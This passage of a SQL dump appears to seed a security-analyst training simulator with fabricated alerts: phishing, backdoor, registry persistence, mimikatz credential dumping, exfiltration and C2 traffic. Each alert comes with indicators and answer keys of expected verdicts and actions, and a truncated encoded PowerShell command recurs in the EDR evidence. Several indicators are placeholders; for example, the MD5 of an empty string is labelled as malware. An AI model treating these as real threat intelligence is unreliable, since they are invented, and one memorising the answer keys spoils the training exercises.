attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Policy_Update.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name used in past spear phishing 
campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access - Spear Phishing Campaign\",\"date\":\"2026-02-01T20:32:22.868Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1142, 'Execution - Malicious Document Opens Backdoor', 'high', 'Endpoint Detection and Response (EDR)', 'A malicious document was opened on the endpoint, which triggered the execution of a backdoor. This allows attackers remote access to the system, potentially leading to further malicious activities.', 'Malware Execution', 'T1203: Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:22:30Z\",\"event_id\":\"EDR-2023-5678\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"malicious_file\":\"Invoice_Q3_2023.docx\",\"executed_process\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\backdoor.exe\",\"username\":\"john.doe\",\"host_name\":\"DESKTOP-1A2B3C\",\"action\":\"Malware Execution Detected\"}', '2026-02-01 14:02:29', '2026-02-23 20:06:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known command and control IP associated with APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_Q3_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Malicious document used to deliver the payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active 
Directory\",\"verdict\":\"clean\",\"details\":\"Employee account used during the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1143, 'Persistence - Registry Modification', 'high', 'Registry Monitoring Tools', 'Patchwork modifies the Windows registry to maintain persistence, ensuring their backdoor remains active even after system reboots. The registry key associated with the backdoor was altered to execute a malicious binary upon system startup.', 'Persistence Mechanism', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T14:35:22Z\",\"event_id\":4624,\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.5\",\"modified_registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"new_value\":\"C:\\\\Windows\\\\System32\\\\maliciousapp.exe\",\"username\":\"victim_user\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"process_id\":1234,\"process_name\":\"regedit.exe\"}', '2026-02-01 14:02:29', '2026-02-23 20:06:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Patchwork APT backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"regedit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used for persistence by Patchwork APT.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"victim_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"User 
Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.870Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:35:22Z\\\",\\\"event_id\\\":4624,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.5\\\",\\\"modified_registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\maliciousapp.exe\\\",\\\"username\\\":\\\"victim_user\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.870Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:35:22Z\\\",\\\"event_id\\\":4624,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.5\\\",\\\"modified_registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\maliciousapp.exe\\\",\\\"username\\\":\\\"victim_user\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.870Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:35:22Z\\\",\\\"event_id\\\":4624,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.5\\\",\\\"modified_registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\maliciousapp.exe\\\",\\\"username\\\":\\\"victim_user\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.870Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:35:22Z\\\",\\\"event_id\\\":4624,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.5\\\",\\\"modified_registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\maliciousapp.exe\\\",\\\"username\\\":\\\"victim_user\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.870Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:35:22Z\\\",\\\"event_id\\\":4624,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.5\\\",\\\"modified_registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\maliciousapp.exe\\\",\\\"username\\\":\\\"victim_user\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1144, 'Lateral Movement - Credential Dumping', 'high', 'Network Traffic Analysis', 'Detected credential dumping activity associated with Patchwork APT group. The actor is attempting lateral movement using harvested credentials to access sensitive areas of the network.', 'Credential Access', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:32:55Z\",\"event_id\":\"123456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.2.3\",\"username\":\"jdoe\",\"executed_command\":\"mimikatz.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"destination_hostname\":\"sensitive-server.internal\",\"network_protocol\":\"SMB\",\"alert_info\":\"Credential dumping detected using mimikatz.exe by Patchwork APT group.\"}', '2026-02-01 14:02:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with Patchwork APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of sensitive server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Mimikatz is a known credential dumping tool.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious version of mimikatz.exe.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Valid internal user 
account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1145, 'Exfiltration - Data Compression and Exfil', 'high', 'Data Loss Prevention (DLP) Systems', 'The attackers compressed sensitive data and exfiltrated it to a remote server. The data was observed being sent from an internal IP to a suspicious external IP. The operation involved compressing files before transmission, indicating a step in a larger data exfiltration campaign targeting compromised Pakistani entities.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T11:23:45Z\",\"source_ip\":\"10.0.15.5\",\"destination_ip\":\"203.0.113.45\",\"compressed_file\":\"sensitive_data.zip\",\"hash\":\"3a7bd3e2360a9e3d5b1e4b6c7a5e9f6c\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"username\":\"jdoe\",\"file_size\":\"15MB\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"dlp_policy_triggered\":\"Sensitive Data Exfiltration\"}', '2026-02-01 14:02:29', '2026-02-23 20:07:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.15.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the organization.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_research\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a7bd3e2360a9e3d5b1e4b6c7a5e9f6c\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"File hash detected in recent APT campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_dlp\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of sensitive data 
exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.872Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T11:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.15.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"compressed_file\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"3a7bd3e2360a9e3d5b1e4b6c7a5e9f6c\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.872Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T11:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.15.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"compressed_file\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"3a7bd3e2360a9e3d5b1e4b6c7a5e9f6c\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.872Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T11:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.15.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"compressed_file\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"3a7bd3e2360a9e3d5b1e4b6c7a5e9f6c\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.872Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T11:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.15.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"compressed_file\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"3a7bd3e2360a9e3d5b1e4b6c7a5e9f6c\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.872Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T11:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.15.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"compressed_file\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"3a7bd3e2360a9e3d5b1e4b6c7a5e9f6c\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data 
Exfiltration\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1146, 'Spear Phishing Campaign Detected', 'high', 'Email Security Gateway Logs', 'A spear phishing email was detected targeting key personnel in military and government sectors. The email contains a malicious attachment designed to exploit unpatched vulnerabilities.', 'Initial Access', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T08:43:12Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"email_subject\":\"Urgent: Security Update Required\",\"email_sender\":\"no-reply@security-update.com\",\"recipient_email\":\"john.doe@government.org\",\"attachment_name\":\"SecurityUpdate.exe\",\"attachment_hash\":\"a9f5d8c3b8f9e7d6c2a7f9d0b5e8c4a1\",\"detected\":true,\"action_taken\":\"quarantined\"}', '2026-02-07 21:12:17', '2026-02-23 20:05:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing source IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of targeted user\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"no-reply@security-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Threat Analysis\",\"verdict\":\"malicious\",\"details\":\"Phishing sender\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a9f5d8c3b8f9e7d6c2a7f9d0b5e8c4a1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Campaign Detected\",\"date\":\"2026-02-08T19:00:00.275Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1147, 'Malware Execution via Exploit', 'high', 'Endpoint Detection and Response (EDR) Systems', 'Following the initial access, the attackers exploited a zero-day vulnerability to execute a custom malware named \'StealthRat\' on endpoint 192.168.1.45, gaining control over the system. The malware was executed using a payload dropped by the process svchost.exe, which connected to an external command and control server at 203.0.113.45. The hash of the malicious executable is d41d8cd98f00b204e9800998ecf8427e.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"1002\",\"event_type\":\"execution\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"process_name\":\"svchost.exe\",\"malware_name\":\"StealthRat\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"event_description\":\"Zero-day exploit used to execute custom malware\"}', '2026-02-07 21:12:17', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Compromised endpoint\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with StealthRat malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1148, 'C2 Communication Established', 'high', 'Network Traffic Analysis', 'Having established a foothold, the attackers set up command and control (C2) channels to maintain persistent access, facilitating further attacks and data exfiltration from the network.', 'Persistence', 'T1105: Ingress Tool Transfer', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-16T14:32:27Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.57\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"uri\":\"/update/check\",\"request_method\":\"GET\",\"response_code\":200,\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"update.exe\"}', '2026-02-07 21:12:17', '2026-02-23 20:06:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malwarebytes\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware sample\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious executable observed in network traffic\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, 
